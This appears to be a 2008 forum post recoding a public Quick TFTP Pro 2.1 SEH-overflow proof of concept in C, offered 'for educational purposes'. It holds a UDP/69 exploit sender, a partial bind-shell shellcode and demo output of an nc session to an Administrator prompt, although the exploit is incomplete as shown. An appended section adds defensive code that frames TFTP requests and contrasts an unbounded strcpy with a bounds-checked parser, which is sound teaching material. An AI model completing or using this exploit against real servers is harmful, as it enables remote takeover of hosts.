[C] Quick TFTP Pro 2.1 SEH Overflow (0day)


Postby kmkz » Mon Aug 04, 2008 7:14 pm


A small exploit, just to get some practice in C (I started this language only recently).

The original exploit is here: http://www.offensive-security.com/0day/quick-tftp-poc.py.txt
The aim here is to recode that exploit in C while making a few changes (and after having tested it, of course).

It exploits an overflow on port 69, was tested on Windows SP2 and injects a shellcode that gives a bind shell.
What more can I say...

Except that I'm posting it for purely educational purposes, to share one source among many others, without any pretension, coming from a guy who is just getting started with C but who isn't doing it to keep his code jealously to himself and would rather share it, however ugly it is (I'll improve, promise :P).

And now, on to the long-awaited source \o/ (pff..) :oops:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */
#include <unistd.h>      /* close() */
#define port 69          /* TFTP listens on UDP/69 */

/* ******************************************************
Remote Buffer Overflow
Tested on Win.XP sp2 Server
Exploit coded by kmkZ
Just For fun and learn
Do not use this exploit to Destroy
But to teach and reassure

by kmkZ 1/08/08

¤ Demonstration & Usage of this Exploit ¤

 * ~ Enter Target ~ *

[*] Using Socket : 123456789

[*] Connecting ...

[*] Sending Exploit......
[+] Exploit Successful !

[*] BindShell on port 4444

~ # nc -v 4444
(UNKNOWN) [] 4444 (krb524) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>
****************************************************** */

/* ******************************************************
************* Function Prototypes **********************
****************************************************** */

void presentation(void);
void demo(void);

/* ******************************************************
********************** Main ****************************
****************************************************** */

int main(int argc, char **argv)
{
    char *Cible;               /* target host (dotted IPv4), from the command line */
    struct sockaddr_in to;
    int s;
    char buffer[3000];         /* not a buffer made of tapz, eh ;-) */
    /* Bind Shell on port 4444 : the listing is truncated on the page,
       the complete shellcode is in the original PoC linked above */
    char shellcode[] = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
                       "\xff\xd0";

    presentation();
    printf(" * ~ Enter Target ~ * \n");

    if (argc < 2) {
        printf(" [-] Please enter remotehost\n");
        demo();
        return -1;
    }
    Cible = argv[1];

    /* ******************************************************
    ******* Socket initialisation **************************
    ****************************************************** */

    memset(&to, 0, sizeof(to));
    to.sin_family = AF_INET;
    to.sin_addr.s_addr = inet_addr(Cible);
    to.sin_port = htons(port);

    if (to.sin_addr.s_addr == INADDR_NONE) {
        printf(" [-] Invalid target address : %s\n", Cible);
        return -1;
    }

    /* ******************************************************
    ************* Connect on remote host *******************
    ****************************************************** */

    /* TFTP is UDP: connect() on a datagram socket only fixes the peer
       address, so send() below goes to port 69 of the target */
    s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s == -1) {
        printf(" [-] socket() : Failed\n");
        return -1;
    }

    if (connect(s, (struct sockaddr *)&to, sizeof(struct sockaddr_in)) == -1) {
        printf(" [-] Connection : Failed \n [~] Please verify the TFTP server properties / Quick TFTP Pro 2.1 / \n and try again ;-) \n\n");
        close(s);
        return -1;
    }

    printf(" [*] Using Socket : %d\n [*] Connecting ...\n [+]Success!\n", s);

    /* ******************************************************
    **************** BoF Exploit ***************************
    ****************************************************** */

    /* Filler followed by the shellcode. The SEH offset and the handler
       address are not given in this post; take them from the original
       PoC. The shellcode is copied at offset 0 only as a placeholder. */
    memset(buffer, 'A', sizeof(buffer));
    memcpy(buffer, shellcode, sizeof(shellcode) - 1);

    /* ******************************************************
    ************** Send Shellcode to Remote Host ***********
    ****************************************************** */

    printf(" [*] Sending Exploit......\n");
    if (send(s, buffer, sizeof(buffer), 0) == -1) {
        printf(" [-] Exploit Failed \n [~] Please verify the TFTP server properties / Quick TFTP Pro 2.1 / \n and try again ;-) \n\n");
        close(s);
        return -1;
    }
    printf(" [+] Exploit Successful ! \n [*] BindShell on port 4444\n\n");

    close(s);
    return 0;
}

/* ******************************************************
********************** Main End ************************
****************************************************** */

/* ******************************************************
************** Functions *******************************
****************************************************** */

void presentation(void)
{
    printf("\n\n-------------\n /* - Quick TFTP Pro 2.1 SEH Overflow (0day) - */ \n-------------\n\n\n");

    printf("[~] Quick TFTP Pro 2.1 Remote BoF \nCoded by kmkZ\n\n");
    printf("¤ Bug Found By :Mati Aharoni \n");
    printf("¤ muts..at..offensive-security.com\n");
    printf(" [~] Original Source Code here :\n-- http://www.offensive-security.com/0day/quick-tftp-poc.py.txt\n");
}

void demo(void)
{
    printf("* ~ Enter Target ~ *\n");
    printf("[*] Using Socket : 123456789\n");
    printf("[*] Connecting ...\n");
    printf("[+]Success! \n");
    printf("[*] Sending Exploit......\n");
    printf("[+] Exploit Successful ! \n");
    printf("[*] BindShell on port 4444\n");

    printf(" ~ # nc -v 4444\n");
    printf("(UNKNOWN) [] 4444 (krb524) open\n");
    printf("Microsoft Windows XP [Version 5.1.2600]\n");
    printf("(C) Copyright 1985-2001 Microsoft Corp.\n\n");
    printf(" C:\\Documents and Settings\\Administrator> \n\n\n");
    printf(" [-] Exploit : Failed \n [~] Please verify the TFTP server properties / Quick TFTP Pro 2.1 / \n And/or Exploit Usage ..and try again ;-) \n\n");
}

/* ******************************************************
************** Close Functions *************************
****************************************************** */
Posts: 120
Joined: Wed Feb 06, 2008 1:25 pm
Location: Carcassonne, Toulouse
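The C code in the post never builds the TFTP request that the original PoC sends; it only pushes a raw buffer at UDP/69. An SEH overflow in a TFTP daemon comes from copying a request field into a fixed-size stack buffer without checking its length. The block below is an added example of mine, not kmkz's code and not the offensive-security PoC: it frames a TFTP read/write request as RFC 1350 defines it (2-byte opcode, filename, NUL, mode, NUL), shows the unbounded strcpy pattern next to a bounds-checked parser, and feeds the parser a 2000-byte filename of the sort such an exploit carries. The 64/16-byte field limits, the filename "boot.cfg" and the probe length are constructed for the demo and are not Quick TFTP Pro's real buffer sizes or the real crash offset.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

#define TFTP_OP_RRQ 1
#define TFTP_OP_WRQ 2
#define MAX_NAME 64   /* assumed server-side buffer sizes, not Quick TFTP Pro's */
#define MAX_MODE 16

/* Build a RRQ/WRQ per RFC 1350: opcode in network byte order, filename, NUL,
 * mode, NUL. Returns the packet length, or 0 if it does not fit in out[]. */
size_t tftp_build_request(uint16_t opcode, const char *filename, const char *mode,
                          unsigned char *out, size_t outlen)
{
    size_t fl = strlen(filename), ml = strlen(mode);
    size_t need = 2 + fl + 1 + ml + 1;
    if (need > outlen) return 0;
    out[0] = (unsigned char)(opcode >> 8);
    out[1] = (unsigned char)(opcode & 0xff);
    memcpy(out + 2, filename, fl);
    out[2 + fl] = 0;
    memcpy(out + 3 + fl, mode, ml);
    out[3 + fl + ml] = 0;
    return need;
}

/* The pattern that produces this class of bug: a fixed stack buffer and an
 * unbounded copy of an attacker-controlled field. Called below only with the
 * short, well-formed packet; with the 2000-byte filename it would run past
 * name[] and, on Windows, into the SEH chain. */
static void tftp_copy_name_unsafe(const unsigned char *pkt, char name[MAX_NAME])
{
    strcpy(name, (const char *)pkt + 2); /* BUG: length never compared to MAX_NAME */
}

/* Bounds-checked parse: every field is located with memchr() inside the
 * datagram and rejected if it would not fit its destination buffer.
 * Returns 1 on success, 0 on malformed or oversized input. */
int tftp_parse_request(const unsigned char *pkt, size_t len, uint16_t *opcode,
                       char name[MAX_NAME], char mode[MAX_MODE])
{
    if (len < 4) return 0;
    *opcode = (uint16_t)((pkt[0] << 8) | pkt[1]);
    if (*opcode != TFTP_OP_RRQ && *opcode != TFTP_OP_WRQ) return 0;

    const unsigned char *p = pkt + 2, *end = pkt + len;
    const unsigned char *nul1 = memchr(p, 0, (size_t)(end - p));
    if (!nul1) return 0;                        /* filename not terminated */
    size_t fl = (size_t)(nul1 - p);
    if (fl == 0 || fl >= MAX_NAME) return 0;    /* would overflow name[] */

    const unsigned char *m = nul1 + 1;
    const unsigned char *nul2 = memchr(m, 0, (size_t)(end - m));
    if (!nul2) return 0;                        /* mode not terminated */
    size_t ml = (size_t)(nul2 - m);
    if (ml == 0 || ml >= MAX_MODE) return 0;    /* would overflow mode[] */

    memcpy(name, p, fl); name[fl] = 0;
    memcpy(mode, m, ml); mode[ml] = 0;
    return 1;
}

/* Exercise both paths: a normal RRQ round-trips through build/parse, and an
 * RRQ whose filename is 2000 'A's (constructed probe) is rejected by the
 * checked parser. Returns 1 if both behave as expected. */
int tftp_demo(void)
{
    unsigned char pkt[3000];
    char name[MAX_NAME], mode[MAX_MODE];
    uint16_t op;

    size_t n = tftp_build_request(TFTP_OP_RRQ, "boot.cfg", "octet", pkt, sizeof pkt);
    if (n != 2 + 8 + 1 + 5 + 1) return 0;
    if (!tftp_parse_request(pkt, n, &op, name, mode)) return 0;
    if (op != TFTP_OP_RRQ || strcmp(name, "boot.cfg") || strcmp(mode, "octet")) return 0;
    tftp_copy_name_unsafe(pkt, name);           /* safe only because fl < MAX_NAME */
    if (strcmp(name, "boot.cfg")) return 0;

    char longname[2001];
    memset(longname, 'A', 2000);
    longname[2000] = 0;
    n = tftp_build_request(TFTP_OP_RRQ, longname, "octet", pkt, sizeof pkt);
    if (n == 0) return 0;
    if (tftp_parse_request(pkt, n, &op, name, mode)) return 0; /* must be rejected */
    return 1;
}

int main(void)
{
    printf("tftp framing demo: %s\n", tftp_demo() ? "ok" : "FAILED");
    return 0;
}
```

The parser never trusts a NUL to be present: each terminator is searched for within the remaining datagram length, so a request with no NUL at all is rejected instead of read past the end, and the field length is compared with the destination size before any copy. Those two checks are exactly what the strcpy variant lacks.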
